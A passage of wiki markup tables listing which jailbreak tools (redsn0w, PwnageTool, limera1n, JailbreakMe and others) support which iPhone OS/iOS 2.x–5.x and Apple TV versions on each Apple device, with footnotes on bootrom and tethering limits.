| [[PwnageTool]]
| class="rborderplz" | 2.2.1-2.2.5
| colspan="3" {{yes}}
| {{no}}
|-
| [[QuickPwn]]
| class="rborderplz nobrradiusplz" | 2.2.1-2.2.5
| {{yes}}
| {{no}}
| {{yes}}
| {{no}}
|-
| [[redsn0w]]
| class="rborderplz nobrradiusplz" | 0.3
| colspan="3" {{no}}
| {{yes}}
|}
<references group="2.x" />

====3.x====
{| class="wikitable"
|-
! rowspan="2" | iPhone OS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="7" | Device
|-
! [[K48AP|iPad]]
! [[M68AP|iPhone]]
! [[N82AP|iPhone 3G]]
! [[N88AP|iPhone 3GS]]
! [[N45AP|iPod touch]]
! [[N72AP|iPod touch (2nd generation)]]
! [[N18AP|iPod touch (3rd generation)]]
|-
| rowspan="4" | 3.0
| colspan="2" | [[ipwndfu]]
| rowspan="4" {{n/a}}
| colspan="2" {{no}}
| {{yes}}
| colspan="2" {{no}}
| rowspan="4" {{n/a}}
|-
| [[purplera1n]]
| class="rborderplz" | 1.0
| {{yes}}
| {{no}}
| colspan="3" {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 3.0
| colspan="2" {{yes}}
| {{no}}
| {{yes}}
| {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.8-0.9.3
| colspan="5" {{yes}}
|-
| rowspan="2" | 3.0.1
| colspan="2" | [[ipwndfu]]
| rowspan="2" {{n/a}}
| colspan="2" {{no}}
| {{yes}}
| colspan="3" rowspan="2" {{n/a}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.8-0.9.3
| colspan="3" {{yes}}
|-
| rowspan="4" | 3.1
| [[blackra1n]]
| class="rborderplz" | 1.0
| rowspan="4" {{n/a}}
| colspan="2" {{yes}}
| {{partial|Yes}}<ref group="3.x" name="oldboot3gs">Tethered jailbreak for any [[N88AP|iPhone 3GS]] with the [[Bootrom 359.3.2|new bootrom]]. Untethered for the [[Bootrom 359.3|old bootrom]].</ref>
| rowspan="4" colspan="3" {{n/a}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 3.1-3.1.3
| rowspan="2" colspan="2" {{yes}}
| {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.2-0.9.3
| {{partial|Yes}}<ref group="3.x" name="oldboot3gs" />
|-
| rowspan="4" | 3.1.1
| [[blackra1n]]
| class="rborderplz" | 1.0
| rowspan="4" colspan="4" {{n/a}}
| rowspan="4" {{yes}}
| colspan="2" {{partial|Tethered}}
|-
| rowspan="2" | [[PwnageTool]]
| class="rborderplz" | 3.1
| colspan="2" {{no}}
|-
| class="rborderplz" | 3.1.3
| {{yes}}
| {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.3
| {{partial|Yes}}<ref group="3.x" name="oldboot">Tethered jailbreak for any [[N72AP|iPod touch (2nd generation)]] with the [[Bootrom 240.5.1|new bootrom]]. Untethered for the [[Bootrom 240.4|old bootrom]].</ref>
| {{partial|Tethered}}
|-
| rowspan="7" | 3.1.2
| [[blackra1n]]
| class="rborderplz" | 1.0
| rowspan="7" {{n/a}}
| colspan="2" {{yes}}
| {{partial|Yes}}<ref group="3.x" name="oldboot3gs" />
| {{yes}}
| colspan="2" {{partial|Tethered}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| {{yes}}
| colspan="3" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 3.1.4-3.1.5
| rowspan="2" colspan="2" {{yes}}
| colspan="3" {{yes}}
| {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.2-0.9.3
| rowspan="3" {{partial|Yes}}<ref group="3.x" name="oldboot3gs" />
| rowspan="2" {{yes}}
| {{partial|Yes}}<ref group="3.x" name="oldboot" />
| {{partial|Tethered}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | Public Beta-2.9.14
| rowspan="2" {{no}}
| rowspan="2" {{yes}}
| colspan="2" {{no}}
|-
| [[Spirit]]
| class="rborderplz" | 1.0
| colspan="3" {{no}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| colspan="4" {{yes}}
| colspan="2" {{no}}
|-
| rowspan="7" | 3.1.3
| [[blackra1n]]
| class="rborderplz" | 1.0
| rowspan="7" {{n/a}}
| colspan="2" {{yes}}
| {{partial|Yes}}<ref group="3.x" name="oldboot3gs" />
| {{yes}}
| colspan="2" {{no}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| {{yes}}
| colspan="3" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 3.1.5
| colspan="5" {{yes}}
| rowspan="2" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.4
| colspan="2" {{yes}}
| rowspan="3" {{partial|Yes}}<ref group="3.x" name="oldboot3gs" />
| {{yes}}
| {{partial|Yes}}<ref group="3.x" name="oldboot" />
|-
| [[sn0wbreeze]]
| class="rborderplz" | 1.5-2.9.14
| rowspan="2" {{no}}
| rowspan="2" {{yes}}
| colspan="3" {{yes}}
|-
| [[Spirit]]
| class="rborderplz" | 1.0
| {{no}}
| colspan="2" {{yes}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| colspan="6" {{yes}}
|-
| rowspan="3" | 3.2
| [[sn0wbreeze]]
| class="rborderplz nobrradiusplz" | ???-2.9.14
| rowspan="3" {{yes}}
| rowspan="3" colspan="6" {{n/a}}
|-
| [[Spirit]]
| class="rborderplz" | 1.0
|-
| class="rborderplz" colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
|-
| rowspan="2" | 3.2.1
| [[sn0wbreeze]]
| class="rborderplz nobrradiusplz" | ???-2.9.14
| rowspan="2" {{yes}}
| rowspan="2" colspan="6" {{n/a}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
|-
| rowspan="6" | 3.2.2
| [[greenpois0n (jailbreak)|greenpois0n]]
| class="rborderplz" | RC4
| rowspan="5" {{yes}}
| rowspan="6" colspan="6" {{n/a}}
|-
| [[limera1n]]
| class="rborderplz" | 1.0
|-
| [[PwnageTool]]
| class="rborderplz" | 4.1-4.1.3
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6b2-0.9.11b4
|-
| [[sn0wbreeze]]
| class="rborderplz nobrradiusplz" | 2.1-2.9.14
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="3.x" name="modifiedstar">Star can be modified to support 3.2.2, because Apple did not correctly patch the exploits used.</ref>}}
|}
<references group="3.x"/>

===iOS===
====4.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="9" | Device
|-
! [[K48AP|iPad]]
! [[iPad 2]]
! [[N82AP|iPhone 3G]]
! [[N88AP|iPhone 3GS]]
! [[N90AP|iPhone 4 (iPhone3,1)]]
! [[N92AP|iPhone 4 (iPhone3,3)]]
! [[N72AP|iPod touch (2nd generation)]]
! [[N18AP|iPod touch (3rd generation)]]
! [[N81AP|iPod touch (4th generation)]]
|-
| rowspan="6" | 4.0
| colspan="2" | [[ipwndfu]]
| colspan="2" rowspan="6" {{n/a}}
| rowspan="2" {{no}}
| {{yes}}
| {{no}}
| rowspan="6" {{n/a}}
| colspan="2" {{no}}
| rowspan="6" {{n/a}}
|-
| [[limera1n]]
| class="rborderplz" | 1.0
| colspan="2" {{yes}}
| {{no}}
| {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.0-4.01
| rowspan="2" {{yes}}
| {{partial|Yes}}<ref group="4.x_i" name="oldboot3gs" />
| {{no}}
| rowspan="2" {{partial|Yes}}<ref group="4.x_i" name="oldboot" />
| rowspan="2" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.5b3-0.9.6b3
| colspan="2" {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 1.6-2.9.14
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="2" {{yes}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
|-
| rowspan="6" | 4.0.1
| colspan="2" | [[ipwndfu]]
| colspan="2" rowspan="6" {{n/a}}
| rowspan="3" {{no}}
| {{yes}}
| {{no}}
| colspan="4" rowspan="6" {{n/a}}
|-
| [[limera1n]]
| class="rborderplz" | 1.0
| colspan="2" {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.0
| {{partial|Yes}}<ref group="4.x_i" name="oldboot3gs" /><ref group="4.x_i" name="bundle" />
| {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.5b3-0.9.6b3
| {{yes}}
| colspan="2" {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 1.6-2.9.14
| rowspan="2" colspan="3" {{yes}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
|-
| rowspan="6" | 4.0.2
| colspan="2" | [[ipwndfu]]
| colspan="2" rowspan="6" {{n/a}}
| rowspan="3" {{no}}
| {{yes}}
| {{no}}
| rowspan="6" {{n/a}}
| colspan="2" {{no}}
| rowspan="6" {{n/a}}
|-
| [[limera1n]]
| class="rborderplz" | 1.0
| colspan="2" {{yes}}
| {{no}}
| {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.0
| {{partial|Yes}}<ref group="4.x_i" name="oldboot3gs" /><ref group="4.x_i" name="bundle" />
| {{no}}
| colspan="2" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.5b3/0.9.6b3
| {{yes}}
| colspan="2" {{no}}
| {{partial|Yes}}<ref group="4.x_i" name="oldboot" />
| {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.0.2-2.9.14
| colspan="3" {{yes}}
| colspan="2" {{yes}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| colspan="3" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="2" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| rowspan="7" | 4.1
| [[greenpois0n (jailbreak)|greenpois0n]]
| class="rborderplz" | RC5-RC6.1
| {{yes}}
| rowspan="7" {{n/a}}
| rowspan="3" {{no}}
| colspan="2" {{yes}}
| rowspan="7" {{n/a}}
| colspan="3" {{yes}}
|-
| colspan="2" | [[ipwndfu]]
| {{no}}
| {{yes}}
| {{no}}
| colspan="3" {{no}}
|-
| [[limera1n]]
| class="rborderplz" | 1.0
| rowspan="4" {{yes}}
| colspan="2" {{yes}}
| rowspan="4" colspan="3" {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.1-4.1.3
| colspan="2" {{yes}}
| {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6b1-0.9.10b8b
| rowspan="2" colspan="3" {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.1-2.9.5
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="3" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="3" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| rowspan="6" | 4.2.1
| [[greenpois0n (jailbreak)|greenpois0n]]
| class="rborderplz" | RC5-RC6.1
| rowspan="5" {{yes}}
| rowspan="6" {{n/a}}
| rowspan="2" {{no}}
| colspan="2" {{yes}}
| rowspan="6" {{n/a}}
| colspan="3" {{yes}}
|-
| colspan="2" | [[ipwndfu]]
| {{yes}}
| {{no}}
| colspan="3" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.2
| rowspan="3" colspan="3" {{yes}}
| {{no}}
| colspan="2" {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6b1-0.9.11b4
| rowspan="2" colspan="3" {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.2-2.9.14
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="3" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="3" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| 4.2.5
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| colspan="5" {{n/a}}
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="3" {{n/a}}
|-
| rowspan="7" | 4.2.6
| [[greenpois0n (jailbreak)|greenpois0n]]
| class="rborderplz" | RC5 b4-RC6.1
| rowspan="7" colspan="5" {{n/a}}
| rowspan="5" {{yes}}
| rowspan="7" colspan="3" {{n/a}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.2
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6rc9-0.9.10b8b
|-
| colspan="2" | [[Saffron]] ([[JailbreakMe]] 3.0)
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.2-2.9.14
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="5" | 4.2.7
| [[redsn0w]]
| class="rborderplz" | 0.9.8b2-0.9.10b8b
| rowspan="5" colspan="5" {{n/a}}
| rowspan="3" {{yes}}
| rowspan="5" colspan="3" {{n/a}}
|-
| colspan="2" | [[Saffron]] ([[JailbreakMe]] 3.0)
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.6-2.9.14
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="6" | 4.2.8
| [[PwnageTool]]
| class="rborderplz" | 4.2
| rowspan="6" colspan="5" {{n/a}}
| rowspan="4" {{yes}}
| rowspan="6" colspan="3" {{n/a}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6rc18-0.9.10b8b
|-
| colspan="2" | [[Saffron]] ([[JailbreakMe]] 3.0)
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.7-2.9.14
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="3" | 4.2.9
| [[redsn0w]]
| class="rborderplz" | 0.9.8b3-0.9.10b8b
| rowspan="3" colspan="5" {{n/a}}
| {{partial|Tethered}}
| rowspan="3" colspan="3" {{n/a}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="3" | 4.2.10
| [[redsn0w]]
| class="rborderplz" | 0.9.8b7-0.9.10b8b
| rowspan="3" colspan="5" {{n/a}}
| {{partial|Tethered}}
| rowspan="3" colspan="3" {{n/a}}
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="7" | 4.3
| colspan="2" | [[ipwndfu]]
| colspan="2" rowspan="2" {{no}}
| rowspan="7" {{n/a}}
| {{yes}}
| {{no}}
| colspan="2" rowspan="7" {{n/a}}
| colspan="2" rowspan="2" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.2
| {{partial|Yes<ref group="4.x_i" name="bundle" /><ref group="4.x_i" name="newboot" />}}
| {{partial|Tethered<ref group="4.x_i" name="bundle" />}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6rc9-0.9.11b4
| {{partial|Tethered}}
| rowspan="5" {{no}}
| rowspan="3" colspan="2" {{yes}}
| colspan="2" {{partial|Tethered}}
|-
| colspan="2" | [[Saffron]] ([[JailbreakMe]] 3.0)
| rowspan="2" {{yes}}
| rowspan="2" colspan="2" {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.3b4-2.9.14
|-
| colspan="2" | [[Star]] ([[JailbreakMe]] 2.0)
| {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="2" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
| colspan="2" {{partial|Yes<ref group="4.x_i" name="modifiedstar" />}}
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
| colspan="2" {{yes}}
| colspan="2" {{yes}}
|-
| rowspan="6" | 4.3.1
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| rowspan="6" {{n/a}}
| {{yes}}
| {{no}}
| rowspan="6" colspan="2" {{n/a}}
| colspan="2" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.3
| rowspan="5" {{yes}}
| rowspan="5" {{no}}
| rowspan="5" colspan="2" {{yes}}
| rowspan="2" colspan="2" {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6rc9-0.9.11b4
|-
| colspan="2" | [[Saffron]] ([[JailbreakMe]] 3.0)
| {{no}}
| {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.5-2.9.14
| rowspan="2" colspan="2" {{yes}}
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="6" | 4.3.2
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| rowspan="6" {{n/a}}
| {{yes}}
| {{no}}
| rowspan="6" colspan="2" {{n/a}}
| colspan="2" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.3.2
| rowspan="5" {{yes}}
| rowspan="5" {{no}}
| rowspan="5" colspan="2" {{yes}}
| rowspan="5" colspan="2" {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6rc13-0.9.11b4
|-
| colspan="2" | [[Saffron]] ([[JailbreakMe]] 3.0)
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.6-2.9.14
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="6" | 4.3.3
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| rowspan="6" {{n/a}}
| {{yes}}
| {{no}}
| rowspan="6" colspan="2" {{n/a}}
| colspan="2" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.3.3-4.3.3.1
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
| rowspan="5" colspan="2" {{yes}}
| rowspan="5" colspan="2" {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6rc16-0.9.11b4
|-
| colspan="2" | [[Saffron]] ([[JailbreakMe]] 3.0)
| colspan="2" {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.7-2.9.14
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="4" | 4.3.4
| colspan="2" | [[ipwndfu]]
| {{no}}
| rowspan="4" {{no}}
| rowspan="4" {{n/a}}
| {{yes}}
| {{no}}
| rowspan="4" colspan="2" {{n/a}}
| colspan="2" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.8b3-0.9.11b4
| {{partial|Tethered}}
| colspan="2" {{partial|Tethered}}
| colspan="2" {{partial|Tethered}}
|-
| colspan="2" | [[unthredeh4il]]
| rowspan="2" {{yes}}
| colspan="2" rowspan="2" {{yes}}
| colspan="2" rowspan="2" {{yes}}
|-
| colspan="2" | [[unthredera1n]]
|-
| rowspan="4" | 4.3.5
| colspan="2" | [[ipwndfu]]
| {{no}}
| rowspan="4" {{no}}
| rowspan="4" {{n/a}}
| {{yes}}
| {{no}}
| rowspan="4" colspan="2" {{n/a}}
| colspan="2" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.8b7-0.9.11b4
| {{partial|Tethered}}
| colspan="2" {{partial|Tethered}}
| colspan="2" {{partial|Tethered}}
|-
| colspan="2" | [[unthredeh4il]]
| rowspan="2" {{yes}}
| colspan="2" rowspan="2" {{yes}}
| colspan="2" rowspan="2" {{yes|class=nobrradiusplz}}
|-
| colspan="2" | [[unthredera1n]]
|}
<references group="4.x_i">
<ref name="oldboot3gs">Will only work for [[N88AP|iPhone 3GS]] running the [[Bootrom 359.3|old bootrom]].</ref>
<ref name="oldboot">Will only work for [[N72AP|iPod touch (2nd generation)]] running the [[Bootrom 240.4|old bootrom]].</ref>
<ref name="modifiedstar">Star can be modified to support 4.0.2-4.3, because Apple did not correctly patch the exploits used.</ref>
<ref name="bundle">An unofficial firmware bundle for this version must be manually added.</ref>
<ref name="newboot">Tethered jailbreak for any [[N88AP|iPhone 3GS]] with the [[Bootrom 359.3.2|new bootrom]]. Untethered for the [[Bootrom 359.3|old bootrom]].</ref>
</references>

=====Apple TV=====
'''Note''': "Marketing Version" is the version that the Apple TV reports in its "About" screen.
{| class="wikitable"
|-
! rowspan="2" | Marketing Version
! rowspan="2" | iOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! Device
|-
! [[K66AP|Apple TV (2nd generation)]]
|-
| rowspan="6" | 4.0
| rowspan="6" | 4.1
| [[greenpois0n (jailbreak)|greenpois0n]]
| RC6
| rowspan="3" {{partial|Yes<ref group="4.x_atv" name="nogui" />}}
|-
| [[limera1n]]
| class="rborderplz" | 1.0
|-
| [[PwnageTool]]
| class="rborderplz" | 4.1
|-
| [[Seas0nPass]]
| class="rborderplz" | ?
| {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.1
| rowspan="2" {{partial|Yes<ref group="4.x_atv" name="nogui" />}}
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="3" | 4.1
| rowspan="3" | 4.2
| [[PwnageTool]]
| ?
| {{partial|Yes<ref group="4.x_atv" name="bundle" />}}
|-
| [[Seas0nPass]]
| class="rborderplz" | ?
| rowspan="2" {{yes}}
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="5" | 4.1.1
| rowspan="5" | 4.2.1
| [[greenpois0n (jailbreak)|greenpois0n]]
| RC6-RC6.1
| rowspan="5" {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.2
|-
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.6.7 (Mac)
|-
| class="rborderplz" | ? (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="3" | 4.2
| rowspan="3" | 4.3
| rowspan="2" | [[Seas0nPass]]
| 0.7.2 (Mac)
| rowspan="3" {{yes}}
|-
| class="rborderplz" | ? (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="6" | 4.2.1
| rowspan="6" | 4.3
| [[PwnageTool]]
| 4.3-4.3.3.1
| rowspan="6" {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.6rc16
|-
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.7.3 (Mac)
|-
| class="rborderplz" | 0.3.7.13.2017 (Windows)
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.5-2.7.1
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="4" | 4.2.2
| rowspan="4" | 4.3
| [[PwnageTool]]
| 4.3-4.3.3.1
| {{partial|Yes<ref group="4.x_atv" name="bundle" />}}
|-
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.7.6.??? (Mac)
| rowspan="3" {{yes}}
|-
| class="rborderplz" | 0.3.13.2017 (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|-
| colspan="2" rowspan="3" | 4.3
| rowspan="2" | [[Seas0nPass]]
| 0.7.8.??? (Mac)
| rowspan="3" {{yes}}
|-
| class="rborderplz" | 0.3.29.???? (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|}
<references group="4.x_atv">
<ref name="nogui">No package management GUI.</ref>
<ref name="bundle">A firmware bundle for this version must be manually added.</ref>
</references>

====5.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="8" | Device
|-
! [[K48AP|iPad]]
! [[iPad 2]]
! [[iPad (3rd generation)]]
! [[N88AP|iPhone 3GS]]
! [[iPhone 4]]
! [[N94AP|iPhone 4S]]
! [[N18AP|iPod touch (3rd generation)]]
! [[N81AP|iPod touch (4th generation)]]
|-
| rowspan="8" | 5.0
| [[Absinthe]]
| class="rborderplz" | 0.1-0.4
| colspan="2" {{no}}
| rowspan="8" {{n/a}}
| colspan="2" {{no}}
| {{yes}}
| colspan="2" {{no}}
|-
| [[Ac1dSn0w]]
| Beta 1-Beta 2
| {{partial|Tethered}}
| {{no}}
| colspan="2" {{partial|Tethered}}
| colspan="2" {{no}}
| {{partial|Tethered}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| {{yes}}
| colspan="4" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 4.3.3<ref group="5.x_i" name="bundle" />
| rowspan="3" {{partial|Tethered}}
| rowspan="5" {{no}}
| {{no}}
| {{partial|Tethered}}
| colspan="3" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.9b3-0.9.11b4
| colspan="2" rowspan="2" {{partial|Tethered}}
| rowspan="4" {{no}}
| colspan="2" rowspan="2" {{partial|Tethered}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.8b8
|-
| colspan="2" | [[unthredeh4il]]
| rowspan="2" {{yes}}
| colspan="2" rowspan="2" {{yes}}
| colspan="2" rowspan="2" {{yes}}
|-
| colspan="2" | [[unthredera1n]]
|-
| rowspan="8" | 5.0.1
| [[Absinthe]]
| class="rborderplz" | 0.1-0.4
| {{no}}
| {{yes}}
| rowspan="8" {{n/a}}
| colspan="2" {{no}}
| {{yes}}
| colspan="2" {{no}}
|-
| [[Ac1dSn0w]]
| Beta 1-Beta 2
| {{partial|Tethered}}
| {{no}}
| colspan="2" {{partial|Tethered}}
| colspan="2" {{no}}
| {{partial|Tethered}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="2" {{no}}
| {{yes}}
| colspan="4" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 5.0.1
| {{yes}}
| {{no}}
| colspan="2" {{yes}}
| {{no}}
| colspan="2" {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.10b4-0.9.11b4
| colspan="2" {{yes}}
| colspan="5" {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.8b11-2.9.14
| rowspan="3" {{yes}}
| rowspan="3" {{no}}
| colspan="2" rowspan="3" {{yes}}
| rowspan="3" {{no}}
| colspan="2" rowspan="3" {{yes}}
|-
| colspan="2" | [[unthredeh4il]]
|-
| colspan="2" | [[unthredera1n]]
|-
| rowspan="5" | 5.1
| colspan="2" | [[ipwndfu]]
| colspan="3" {{no}}
| {{yes}}
| colspan="4" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.10b6-0.9.11b4
| rowspan="4" {{yes}}
| rowspan="4" colspan="2" {{no}}
| colspan="2" rowspan="2" {{partial|Tethered}}
| rowspan="4" {{no}}
| colspan="2" rowspan="2" {{partial|Tethered}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.9.2-2.9.3
|-
| colspan="2" | [[unthredeh4il]]
| colspan="2" rowspan="2" {{yes}}
| colspan="2" rowspan="2" {{yes}}
|-
| colspan="2" | [[unthredera1n]]
|-
| rowspan="8" | 5.1.1
| [[Absinthe]]
| class="rborderplz" | 2.0-2.0.4
| colspan="8" rowspan="2" {{yes}}
|-
| [[cinject]]
| class="rborderplz" | 0.5.3-0.5.4
|-
| colspan="2" | [[ipwndfu]]
| colspan="3" {{no}}
| {{yes}}
| colspan="4" {{no}}
|-
| [[PwnageTool]]
| class="rborderplz" | 5.1.1
| {{yes}}
| colspan="2" {{no}}
| colspan="2" {{yes}}
| colspan="3" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.12b1-0.9.14b2
| colspan="8" {{yes}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.9.6-2.9.14
| rowspan="3" {{yes}}
| rowspan="3" colspan="2" {{no}}
| colspan="2" rowspan="3" {{yes}}
| rowspan="3" {{no}}
| colspan="2" rowspan="3" {{yes}}
|-
| colspan="2" | [[unthredeh4il]]
|-
| colspan="2" | [[unthredera1n]]
|}
<references group="5.x_i">
<ref name="bundle">A firmware bundle for this version must be manually added.</ref>
</references>

=====Apple TV=====
'''Note''': "Marketing Version" is the version that the Apple TV reports in its "About" screen.
{| class="wikitable"
|-
! rowspan="2" | Marketing Version
! rowspan="2" | iOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! Device
|-
! [[K66AP|Apple TV (2nd generation)]]
|-
| rowspan="3" | 4.4
| rowspan="3" | 5.0
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.7.9.??? (Mac)
| rowspan="2" {{partial|Tethered}}
|-
| class="rborderplz" | 0.3.37.???? (Windows)
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="3" | 4.4.1
| rowspan="3" | 5.0
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.7.9.210 (Mac)
| rowspan="2" {{partial|Tethered}}
|-
| class="rborderplz" | 0.3.37.???? (Windows)
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="3" | 4.4.2
| rowspan="3" | 5.0
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.7.9.230 (Mac)
| rowspan="2" {{partial|Tethered}}
|-
| class="rborderplz" | 0.3.42.3335 (Windows)
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
